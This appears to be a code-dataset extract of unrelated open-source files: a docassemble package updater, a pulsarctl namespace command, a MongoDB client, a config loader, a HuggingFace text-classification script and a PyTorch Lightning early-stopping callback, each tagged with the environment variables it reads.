logfilecontents += " ".join(commands) + "\n"
#returnval = pip.main(commands)
try:
subprocess.run(commands)
returnval = 0
except subprocess.CalledProcessError as err:
returnval = err.returncode
fix_fnctl()
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
sys.stderr.write('Finished running pip' + "\n")
with open(pip_log.name, 'rU', encoding='utf-8') as x:
logfilecontents += x.read()
pip_log.close()
try:
sys.stderr.write(logfilecontents + "\n")
except:
pass
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
sys.stderr.write('uninstall_package: done' + "\n")
return returnval, logfilecontents
class Object(object):
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
pass
def get_installed_distributions():
start_time = time.time()
sys.stderr.write("get_installed_distributions: starting\n")
results = list()
try:
output = subprocess.check_output(['pip', '--version']).decode('utf-8', 'ignore')
except subprocess.CalledProcessError as err:
output = err.output.decode('utf-8', 'ignore')
sys.stderr.write("get_installed_distributions: pip version:\n" + output)
try:
output = subprocess.check_output(['pip', 'list', '--format=freeze']).decode('utf-8', 'ignore')
except subprocess.CalledProcessError as err:
output = err.output.decode('utf-8', 'ignore')
#sys.stderr.write("get_installed_distributions: result of pip list --format freeze was:\n" + str(output) + "\n")
for line in output.split('\n'):
a = line.split("==")
if len(a) == 2:
results.append(Object(key=a[0], version=a[1]))
sys.stderr.write("get_installed_distributions: ending after " + str(time.time() - start_time) + " seconds\n")
#sys.stderr.write(repr([x.key for x in results]) + "\n")
return results
def get_pip_info(package_name):
#sys.stderr.write("get_pip_info: " + package_name + "\n")
try:
output = subprocess.check_output(['pip', 'show', package_name]).decode('utf-8', 'ignore')
except subprocess.CalledProcessError as err:
output = ""
sys.stderr.write("get_pip_info: error. output was " + err.output.decode('utf-8', 'ignore') + "\n")
# old_stdout = sys.stdout
# sys.stdout = saved_stdout = StringIO()
# pip.main(['show', package_name])
# sys.stdout = old_stdout
# output = saved_stdout.getvalue()
results = dict()
if not isinstance(output, str):
output = output.decode('utf-8', 'ignore')
for line in output.split('\n'):
#sys.stderr.write("Found line " + str(line) + "\n")
a = line.split(": ")
if len(a) == 2:
#sys.stderr.write("Found " + a[0] + " which was " + a[1] + "\n")
results[a[0]] = a[1]
for key in ['Name', 'Home-page', 'Version']:
if key not in results:
results[key] = None
return results
if __name__ == "__main__":
#import docassemble.webapp.database
from docassemble.webapp.app_object import app
with app.app_context():
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
from docassemble.webapp.daredis import r
#app.config['SQLALCHEMY_DATABASE_URI'] = docassemble.webapp.database.alchemy_connection_string()
if mode == 'initialize':
sys.stderr.write("updating with mode initialize\n")
update_versions()
any_package = Package.query.filter_by(active=True).first()
if any_package is None:
add_dependencies(1)
update_versions()
check_for_updates(doing_startup=True)
remove_inactive_hosts()
else:
sys.stderr.write("updating with mode check_for_updates\n")
check_for_updates()
from docassemble.base.config import daconfig
if USING_SUPERVISOR:
SUPERVISORCTL = daconfig.get('supervisorctl', 'supervisorctl')
container_role = ':' + os.environ.get('CONTAINERROLE', '') + ':'
if re.search(r':(web|celery|all):', container_role):
sys.stderr.write("Sending reset signal\n")
args = [SUPERVISORCTL, '-s', 'http://localhost:9001', 'start', 'reset']
subprocess.run(args)
else:
sys.stderr.write("Not sending reset signal because not web or celery\n")
else:
sys.stderr.write("update: touched wsgi file" + "\n")
wsgi_file = daconfig.get('webapp', '/usr/share/docassemble/webapp/docassemble.wsgi')
if os.path.isfile(wsgi_file):
with open(wsgi_file, 'a'):
os.utime(wsgi_file, None)
db.engine.dispose()
sys.exit(0)
|
[] |
[] |
[
"CONTAINERROLE",
"SUPERVISOR_SERVER_URL"
] |
[]
|
["CONTAINERROLE", "SUPERVISOR_SERVER_URL"]
|
python
| 2 | 0 | |
pkg/ctl/namespace/get_anti_affinity_ns.go
|
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package namespace
import (
"github.com/streamnative/pulsarctl/pkg/cmdutils"
"github.com/streamnative/pulsarctl/pkg/pulsar/common"
"github.com/streamnative/pulsarctl/pkg/pulsar/utils"
"github.com/spf13/cobra"
"github.com/spf13/pflag"
)
func getAntiAffinityNamespaces(vc *cmdutils.VerbCmd) {
desc := cmdutils.LongDescription{}
desc.CommandUsedFor = "Get the list of namespaces in the same anti-affinity group."
desc.CommandPermission = "This command requires tenant admin permissions."
var examples []cmdutils.Example
getRetention := cmdutils.Example{
Desc: "Get the list of namespaces in the same anti-affinity group.",
Command: "pulsarctl namespaces get-anti-affinity-namespaces tenant/namespace",
}
examples = append(examples, getRetention)
desc.CommandExamples = examples
var out []cmdutils.Output
successOut := cmdutils.Output{
Desc: "normal output",
Out: "(anti-affinity name list)",
}
noNamespaceName := cmdutils.Output{
Desc: "you must specify a tenant/namespace name, please check if the tenant/namespace name is provided",
Out: "[✖] the namespace name is not specified or the namespace name is specified more than one",
}
tenantNotExistError := cmdutils.Output{
Desc: "the tenant does not exist",
Out: "[✖] code: 404 reason: Tenant does not exist",
}
nsNotExistError := cmdutils.Output{
Desc: "the namespace does not exist",
Out: "[✖] code: 404 reason: Namespace (tenant/namespace) does not exist",
}
out = append(out, successOut, noNamespaceName, tenantNotExistError, nsNotExistError)
desc.CommandOutput = out
var data utils.NamespacesData
vc.SetDescription(
"get-anti-affinity-namespaces",
"Get the list of namespaces in the same anti-affinity group.",
desc.ToString(),
desc.ExampleToString(),
"get-anti-affinity-namespaces",
)
vc.SetRunFunc(func() error {
return doGetAntiAffinityNamespaces(vc, data)
})
vc.FlagSetGroup.InFlagSet("Namespaces", func(flagSet *pflag.FlagSet) {
flagSet.StringVarP(
&data.AntiAffinityGroup,
"group",
"g",
"",
"Anti-affinity group name")
flagSet.StringVarP(
&data.Cluster,
"cluster",
"c",
"",
"Cluster name")
flagSet.StringVarP(
&data.Tenant,
"tenant",
"t",
"",
"tenant is only used for authorization. \n"+
"Client has to be admin of any of the tenant to access this api")
cobra.MarkFlagRequired(flagSet, "group")
})
vc.EnableOutputFlagSet()
}
func doGetAntiAffinityNamespaces(vc *cmdutils.VerbCmd, data utils.NamespacesData) error {
admin := cmdutils.NewPulsarClientWithAPIVersion(common.V1)
strList, err := admin.Namespaces().GetAntiAffinityNamespaces(data.Tenant, data.Cluster, data.AntiAffinityGroup)
if err == nil {
vc.Command.Println(strList)
}
return err
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| null | null | null |
db_client/mongodb_client.py
|
from pymongo import MongoClient
from dotenv import load_dotenv
import json
import os
load_dotenv()
JWT_DURATION = os.getenv("JWT_DURATION")
JWT_SECRET = os.getenv("JWT_SECRET")
MONGODB_SRV = os.getenv("MONGODB_SRV")
# Instantiate database object and collection object
client = MongoClient(MONGODB_SRV)
database = client.dev
devices_collection = database.devices
dist_collection = database.distMeasure
color_collection = database.colorMeasure
reso_collection = database.resoMeasure
|
[] |
[] |
[
"JWT_SECRET",
"MONGODB_SRV",
"JWT_DURATION"
] |
[]
|
["JWT_SECRET", "MONGODB_SRV", "JWT_DURATION"]
|
python
| 3 | 0 | |
misc/configuration/config.py
|
import os.path
from importlib import import_module
basedir = os.path.abspath(os.path.dirname(__file__))
env = os.getenv('ENVIRONMENT', 'local')
if not env in ['local', 'test']:
config_file = '/path/to/config/directory/' + env + '.py'
if not os.path.isfile(config_file):
env = 'local'
config_name = 'path.to.config.directory.' + env
module = import_module(config_name)
config = module.config
config.MIGRATIONS_PATH = os.path.join(basedir, 'migrations')
|
[] |
[] |
[
"ENVIRONMENT"
] |
[]
|
["ENVIRONMENT"]
|
python
| 1 | 0 | |
examples/tensorflow/text-classification/run_text_classification.py
|
#!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Fine-tuning the library models for sequence classification."""
# You can also adapt this script on your own text classification task. Pointers for this are left as comments.
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import Optional
import numpy as np
from datasets import load_dataset
from transformers import (
AutoConfig,
AutoTokenizer,
HfArgumentParser,
PretrainedConfig,
TFAutoModelForSequenceClassification,
TrainingArguments,
set_seed,
)
from transformers.file_utils import CONFIG_NAME, TF2_WEIGHTS_NAME
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1" # Reduce the amount of console output from TF
import tensorflow as tf # noqa: E402
logger = logging.getLogger(__name__)
# region Helper classes
class DataSequence(tf.keras.utils.Sequence):
# We use a Sequence object to load the data. Although it's completely possible to load your data as Numpy/TF arrays
# and pass those straight to the Model, this constrains you in a couple of ways. Most notably, it requires all
# the data to be padded to the length of the longest input example, and it also requires the whole dataset to be
# loaded into memory. If these aren't major problems for you, you can skip the sequence object in your own code!
def __init__(self, dataset, non_label_column_names, batch_size, labels, shuffle=True):
super().__init__()
# Retain all of the columns not present in the original data - these are the ones added by the tokenizer
self.data = {
key: dataset[key]
for key in dataset.features.keys()
if key not in non_label_column_names and key != "label"
}
data_lengths = {len(array) for array in self.data.values()}
assert len(data_lengths) == 1, "Dataset arrays differ in length!"
self.data_length = data_lengths.pop()
self.num_batches = ceil(self.data_length / batch_size)
if labels:
self.labels = np.array(dataset["label"])
assert len(self.labels) == self.data_length, "Labels not the same length as input arrays!"
else:
self.labels = None
self.batch_size = batch_size
self.shuffle = shuffle
if self.shuffle:
# Shuffle the data order
self.permutation = np.random.permutation(self.data_length)
else:
self.permutation = None
def on_epoch_end(self):
# If we're shuffling, reshuffle the data order after each epoch
if self.shuffle:
self.permutation = np.random.permutation(self.data_length)
def __getitem__(self, item):
# Note that this yields a batch, not a single sample
batch_start = item * self.batch_size
batch_end = (item + 1) * self.batch_size
if self.shuffle:
data_indices = self.permutation[batch_start:batch_end]
else:
data_indices = np.arange(batch_start, batch_end)
# We want to pad the data as little as possible, so we only pad each batch
# to the maximum length within that batch. We do that by stacking the variable-
# length inputs into a ragged tensor and then densifying it.
batch_input = {
key: tf.ragged.constant([data[i] for i in data_indices]).to_tensor() for key, data in self.data.items()
}
if self.labels is None:
return batch_input
else:
batch_labels = self.labels[data_indices]
return batch_input, batch_labels
def __len__(self):
return self.num_batches
class SavePretrainedCallback(tf.keras.callbacks.Callback):
# Hugging Face models have a save_pretrained() method that saves both the weights and the necessary
# metadata to allow them to be loaded as a pretrained model in future. This is a simple Keras callback
# that saves the model with this method after each epoch.
def __init__(self, output_dir, **kwargs):
super().__init__()
self.output_dir = output_dir
def on_epoch_end(self, epoch, logs=None):
self.model.save_pretrained(self.output_dir)
# endregion
# region Command-line arguments
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
Using `HfArgumentParser` we can turn this class
into argparse arguments to be able to specify them on
the command line.
"""
train_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the training data."}
)
validation_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the validation data."}
)
test_file: Optional[str] = field(default=None, metadata={"help": "A csv or a json file containing the test data."})
max_seq_length: int = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of predict examples to this "
"value if set."
},
)
def __post_init__(self):
train_extension = self.train_file.split(".")[-1].lower() if self.train_file is not None else None
validation_extension = (
self.validation_file.split(".")[-1].lower() if self.validation_file is not None else None
)
test_extension = self.test_file.split(".")[-1].lower() if self.test_file is not None else None
extensions = {train_extension, validation_extension, test_extension}
extensions.discard(None)
assert len(extensions) != 0, "Need to supply at least one of --train_file, --validation_file or --test_file!"
assert len(extensions) == 1, "All input files should have the same file extension, either csv or json!"
assert "csv" in extensions or "json" in extensions, "Input files should have either .csv or .json extensions!"
self.input_file_extension = extensions.pop()
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
# endregion
def main():
# region Argument parsing
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
output_dir = Path(training_args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
# endregion
# region Checkpoints
# Detecting last checkpoint.
checkpoint = None
if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
if (output_dir / CONFIG_NAME).is_file() and (output_dir / TF2_WEIGHTS_NAME).is_file():
checkpoint = output_dir
logger.info(
f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
" behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
else:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to continue regardless."
)
# endregion
# region Logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger.setLevel(logging.INFO)
logger.info(f"Training/evaluation parameters {training_args}")
# endregion
# region Loading data
# For CSV/JSON files, this script will use the 'label' field as the label and the 'sentence1' and optionally
# 'sentence2' fields as inputs if they exist. If not, the first two fields not named label are used if at least two
# columns are provided. Note that the term 'sentence' can be slightly misleading, as they often contain more than
# a single grammatical sentence, when the task requires it.
#
# If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
# single column. You can easily tweak this behavior (see below)
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
data_files = {"train": data_args.train_file, "validation": data_args.validation_file, "test": data_args.test_file}
data_files = {key: file for key, file in data_files.items() if file is not None}
for key in data_files.keys():
logger.info(f"Loading a local file for {key}: {data_files[key]}")
if data_args.input_file_extension == "csv":
# Loading a dataset from local csv files
datasets = load_dataset("csv", data_files=data_files, cache_dir=model_args.cache_dir)
else:
# Loading a dataset from local json files
datasets = load_dataset("json", data_files=data_files, cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# endregion
# region Label preprocessing
# If you've passed us a training set, we try to infer your labels from it
if "train" in datasets:
# By default we assume that if your label column looks like a float then you're doing regression,
# and if not then you're doing classification. This is something you may want to change!
is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
# A useful fast method:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
label_list = datasets["train"].unique("label")
label_list.sort() # Let's sort it for determinism
num_labels = len(label_list)
# If you haven't passed a training set, we read label info from the saved model (this happens later)
else:
num_labels = None
label_list = None
is_regression = None
# endregion
# region Load pretrained model and tokenizer
# Set seed before initializing model
set_seed(training_args.seed)
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
if checkpoint is not None:
config_path = training_args.output_dir
elif model_args.config_name:
config_path = model_args.config_name
else:
config_path = model_args.model_name_or_path
if num_labels is not None:
config = AutoConfig.from_pretrained(
config_path,
num_labels=num_labels,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
config = AutoConfig.from_pretrained(
config_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
if checkpoint is None:
model_path = model_args.model_name_or_path
else:
model_path = checkpoint
model = TFAutoModelForSequenceClassification.from_pretrained(
model_path,
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# endregion
# region Optimizer, loss and compilation
optimizer = tf.keras.optimizers.Adam(
learning_rate=training_args.learning_rate,
beta_1=training_args.adam_beta1,
beta_2=training_args.adam_beta2,
epsilon=training_args.adam_epsilon,
clipnorm=training_args.max_grad_norm,
)
if is_regression:
loss = tf.keras.losses.MeanSquaredError()
metrics = []
else:
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
metrics = ["accuracy"]
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
# endregion
# region Dataset preprocessing
# Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
column_names = {col for cols in datasets.column_names.values() for col in cols}
non_label_column_names = [name for name in column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
elif "sentence1" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", None
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Padding strategy
if data_args.pad_to_max_length:
padding = "max_length"
else:
# We will pad later, dynamically at batch creation, to the max sequence length in each batch
padding = False
if data_args.max_seq_length > tokenizer.model_max_length:
logger.warning(
f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the"
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
# Ensure that our labels match the model's, if it has some pre-specified
if "train" in datasets:
if not is_regression and model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id:
label_name_to_id = model.config.label2id
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
label_to_id = label_name_to_id # Use the model's labels
else:
logger.warning(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
"\nIgnoring the model labels as a result.",
)
label_to_id = {v: i for i, v in enumerate(label_list)}
elif not is_regression:
label_to_id = {v: i for i, v in enumerate(label_list)}
else:
label_to_id = None
# Now we've established our label2id, let's overwrite the model config with it.
model.config.label2id = label_to_id
if model.config.label2id is not None:
model.config.id2label = {id: label for label, id in label_to_id.items()}
else:
model.config.id2label = None
else:
label_to_id = model.config.label2id # Just load the data from the model
if "validation" in datasets and model.config.label2id is not None:
validation_label_list = datasets["validation"].unique("label")
for val_label in validation_label_list:
assert val_label in label_to_id, f"Label {val_label} is in the validation set but not the training set!"
def preprocess_function(examples):
# Tokenize the texts
args = (
(examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
)
result = tokenizer(*args, padding=padding, max_length=max_seq_length, truncation=True)
# Map labels to IDs
if model.config.label2id is not None and "label" in examples:
result["label"] = [(model.config.label2id[l] if l != -1 else -1) for l in examples["label"]]
return result
datasets = datasets.map(preprocess_function, batched=True, load_from_cache_file=not data_args.overwrite_cache)
if "train" in datasets:
train_dataset = datasets["train"]
if data_args.max_train_samples is not None:
train_dataset = train_dataset.select(range(data_args.max_train_samples))
# Log a few random samples from the training set so we can see that it's working as expected:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
if "validation" in datasets:
eval_dataset = datasets["validation"]
if data_args.max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
if "test" in datasets:
predict_dataset = datasets["test"]
if data_args.max_predict_samples is not None:
predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
# endregion
# region Training
if "train" in datasets:
training_dataset = DataSequence(
train_dataset, non_label_column_names, batch_size=training_args.per_device_train_batch_size, labels=True
)
if "validation" in datasets:
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
else:
eval_dataset = None
callbacks = [SavePretrainedCallback(output_dir=training_args.output_dir)]
model.fit(
training_dataset,
validation_data=eval_dataset,
epochs=int(training_args.num_train_epochs),
callbacks=callbacks,
)
elif "validation" in datasets:
# If there's a validation dataset but no training set, just evaluate the metrics
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
logger.info("Computing metrics on validation data...")
if is_regression:
loss = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}")
else:
loss, accuracy = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}, Accuracy: {accuracy * 100:.4f}%")
# endregion
# region Prediction
if "test" in datasets:
logger.info("Doing predictions on Predict dataset...")
predict_dataset = DataSequence(
predict_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=False
)
predictions = model.predict(predict_dataset)["logits"]
predictions = np.squeeze(predictions) if is_regression else np.argmax(predictions, axis=1)
output_predict_file = os.path.join(training_args.output_dir, "predict_results.txt")
with open(output_predict_file, "w") as writer:
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if is_regression:
writer.write(f"{index}\t{item:3.3f}\n")
else:
item = model.config.id2label[item]
writer.write(f"{index}\t{item}\n")
logger.info(f"Wrote predictions to {output_predict_file}!")
# endregion
if __name__ == "__main__":
main()
|
[] |
[] |
[
"TF_CPP_MIN_LOG_LEVEL"
] |
[]
|
["TF_CPP_MIN_LOG_LEVEL"]
|
python
| 1 | 0 | |
pytorch_lightning/callbacks/early_stopping.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""
Early Stopping
^^^^^^^^^^^^^^
Monitor a validation metric and stop training when it stops improving.
"""
from copy import deepcopy
import numpy as np
import torch
import torch.distributed as dist
from pytorch_lightning import _logger as log
from pytorch_lightning.callbacks.base import Callback
from pytorch_lightning.utilities import rank_zero_warn
import os
torch_inf = torch.tensor(np.Inf)
try:
import torch_xla
import torch_xla.core.xla_model as xm
except ImportError:
XLA_AVAILABLE = False
else:
XLA_AVAILABLE = True
class EarlyStopping(Callback):
r"""
Args:
monitor: quantity to be monitored. Default: ``'val_loss'``.
.. note:: Has no effect when using `EvalResult` or `TrainResult`
min_delta: minimum change in the monitored quantity
to qualify as an improvement, i.e. an absolute
change of less than `min_delta`, will count as no
improvement. Default: ``0.0``.
patience: number of validation epochs with no improvement
after which training will be stopped. Default: ``3``.
verbose: verbosity mode. Default: ``False``.
mode: one of {auto, min, max}. In `min` mode,
training will stop when the quantity
monitored has stopped decreasing; in `max`
mode it will stop when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity. Default: ``'auto'``.
strict: whether to crash the training if `monitor` is
not found in the validation metrics. Default: ``True``.
Example::
>>> from pytorch_lightning import Trainer
>>> from pytorch_lightning.callbacks import EarlyStopping
>>> early_stopping = EarlyStopping('val_loss')
>>> trainer = Trainer(early_stop_callback=early_stopping)
"""
mode_dict = {
'min': torch.lt,
'max': torch.gt,
}
def __init__(self, monitor: str = 'val_loss', min_delta: float = 0.0, patience: int = 3,
verbose: bool = False, mode: str = 'auto', strict: bool = True):
super().__init__()
self.monitor = monitor
self.patience = patience
self.verbose = verbose
self.strict = strict
self.min_delta = min_delta
self.wait_count = 0
self.stopped_epoch = 0
self.mode = mode
self.warned_result_obj = False
if mode not in self.mode_dict:
if self.verbose > 0:
log.info(f'EarlyStopping mode {mode} is unknown, fallback to auto mode.')
self.mode = 'auto'
if self.mode == 'auto':
if self.monitor == 'acc':
self.mode = 'max'
else:
self.mode = 'min'
if self.verbose > 0:
log.info(f'EarlyStopping mode set to {self.mode} for monitoring {self.monitor}.')
self.min_delta *= 1 if self.monitor_op == torch.gt else -1
self.best_score = torch_inf if self.monitor_op == torch.lt else -torch_inf
def _validate_condition_metric(self, logs):
monitor_val = logs.get(self.monitor)
error_msg = (f'Early stopping conditioned on metric `{self.monitor}`'
f' which is not available. Either add `{self.monitor}` to the return of '
f' validation_epoch end or modify your EarlyStopping callback to use any of the '
f'following: `{"`, `".join(list(logs.keys()))}`')
if monitor_val is None:
if self.strict:
raise RuntimeError(error_msg)
if self.verbose > 0:
rank_zero_warn(error_msg, RuntimeWarning)
return False
return True
@property
def monitor_op(self):
return self.mode_dict[self.mode]
def state_dict(self):
return {
'wait_count': self.wait_count,
'stopped_epoch': self.stopped_epoch,
'best_score': self.best_score,
'patience': self.patience
}
def load_state_dict(self, state_dict):
state_dict = deepcopy(state_dict)
self.wait_count = state_dict['wait_count']
self.stopped_epoch = state_dict['stopped_epoch']
self.best_score = state_dict['best_score']
self.patience = state_dict['patience']
def on_validation_end(self, trainer, pl_module):
self._run_early_stopping_check(trainer, pl_module)
def on_validation_epoch_end(self, trainer, pl_module):
val_es_key = 'val_early_stop_on'
if trainer.callback_metrics.get(val_es_key) is not None:
self.monitor = val_es_key
# disable strict checking when using structured results
if val_es_key in trainer.callback_metrics:
self.strict = False
self._validate_condition_metric(trainer.callback_metrics)
def on_train_epoch_end(self, trainer, pl_module):
# disable early stopping in train loop when there's a val loop
if self.monitor == 'val_early_stop_on':
return
# early stopping can also work in the train loop when there is no val loop and when using structured results
should_check_early_stop = False
train_es_key = 'early_stop_on'
if trainer.callback_metrics.get(train_es_key, None) is not None:
self.monitor = train_es_key
should_check_early_stop = True
if should_check_early_stop:
self._run_early_stopping_check(trainer, pl_module)
def __warn_deprecated_monitor_key(self):
using_result_obj = os.environ.get('PL_USING_RESULT_OBJ', None)
invalid_key = self.monitor not in ['val_loss', 'early_stop_on', 'val_early_step_on', 'loss']
if using_result_obj and not self.warned_result_obj and invalid_key:
self.warned_result_obj = True
m = f"""
When using EvalResult(early_stop_on=X) or TrainResult(early_stop_on=X) the
'monitor' key of EarlyStopping has no effect.
Remove EarlyStopping(monitor='{self.monitor}) to fix')
"""
rank_zero_warn(m)
def _run_early_stopping_check(self, trainer, pl_module):
logs = trainer.callback_metrics
if not self._validate_condition_metric(logs):
return # short circuit if metric not present
self.__warn_deprecated_monitor_key()
current = logs.get(self.monitor)
# when in dev debugging
trainer.dev_debugger.track_early_stopping_history(current)
if not isinstance(current, torch.Tensor):
current = torch.tensor(current, device=pl_module.device)
if trainer.use_tpu and XLA_AVAILABLE:
current = current.cpu()
if self.monitor_op(current - self.min_delta, self.best_score):
self.best_score = current
self.wait_count = 0
else:
self.wait_count += 1
should_stop = self.wait_count >= self.patience
if bool(should_stop):
self.stopped_epoch = trainer.current_epoch
trainer.should_stop = True
# stop every ddp process if any world process decides to stop
self._stop_distributed_training(trainer, pl_module)
def _stop_distributed_training(self, trainer, pl_module):
# in ddp make sure all processes stop when one is flagged
if trainer.use_ddp or trainer.use_ddp2:
stop = torch.tensor(int(trainer.should_stop), device=pl_module.device)
dist.all_reduce(stop, op=dist.reduce_op.SUM)
dist.barrier()
trainer.should_stop = stop == trainer.world_size
if trainer.use_tpu:
stop = torch.tensor(int(trainer.should_stop), device=pl_module.device, dtype=torch.int32)
stop = xm.mesh_reduce("stop_signal", stop, torch.cat)
torch_xla.core.xla_model.rendezvous("pl.EarlyStoppingCallback.stop_distributed_training_check")
trainer.should_stop = int(stop.item()) == trainer.world_size
def on_train_end(self, trainer, pl_module):
if self.stopped_epoch > 0 and self.verbose > 0:
rank_zero_warn('Displayed epoch numbers by `EarlyStopping` start from "1" until v0.6.x,'
' but will start from "0" in v0.8.0.', DeprecationWarning)
